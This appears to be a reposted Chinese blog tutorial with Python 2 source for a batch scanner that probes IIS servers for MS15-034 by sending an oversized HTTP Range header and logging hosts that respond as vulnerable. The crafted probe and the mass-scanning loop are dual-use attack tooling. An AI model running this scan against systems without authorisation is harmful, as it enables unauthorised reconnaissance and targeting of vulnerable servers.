【Python】实现漏洞扫描器之MS15-034漏洞批量扫描+源码分析

来源：互联网发布：windows徽标键在哪编辑：程序博客网时间：2024/05/09 00:59

ms15-034漏洞

影响以下版本操作系统的IIS服务器

Windows 7

Windows 8

Windows server 2008

Windows server 2012

知道其严重性后，在扫描器插件加上这一模块

利用代码如下需要导入socket模块

其中f2是打开一个文件逐行阅读

f3.write写入本地代码我从我的扫描器测试版直接截取过来的不过并不影响阅读

def MS15034():    print '-----------------------------------------------------------'    print '----------------------MS15-034 Scan------------------------'    print '-----------------------------------------------------------'    ipAddr = url    hexAllFfff = "18446744073709551615"    req1 = "GET / HTTP/1.0\r\n\r\n"   #开始配置好相关发送请求    req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"    try:                    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   #建立一个客户端用来接受信息                    client_socket.connect((ipAddr, 80))  #连接到目标主机的80端口                    client_socket.send(req1)    #发送数据                    boringResp = client_socket.recv(1024)   #接受的数据                    if "Microsoft" not in boringResp:    #判断是否是iis服务器                                    print "[*]IS Not IIS SERVER"                    client_socket.close()                    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  #如上                    client_socket.connect((ipAddr, 80))                    client_socket.send(req)                    goodResp = client_socket.recv(1024)                    if "Requested Range Not Satisfiable" in goodResp:  #判断是否存在漏洞                                    print unicode("[+]发现主机可能存在MS15-034漏洞",'gbk')                                    f3.write(ipAddr + '        ' + 'MS15-034' )                    elif " The request has an invalid header name" in goodResp:                                    print '[+]pass..........'                    else:                                    print '[+]pass..........'                                    pass                                        except Exception,e:                    print e for ms15 in f2:    url = ms15.strip('\n')    url=str(url.strip())    url = url.split('//',2)[1]   #将http：//  去掉     host = socket.gethostbyname(url)  #得到ip地址    MS15034()    print unicode('MS15-034扫描完毕！','gbk')    time.sleep(2)

0 0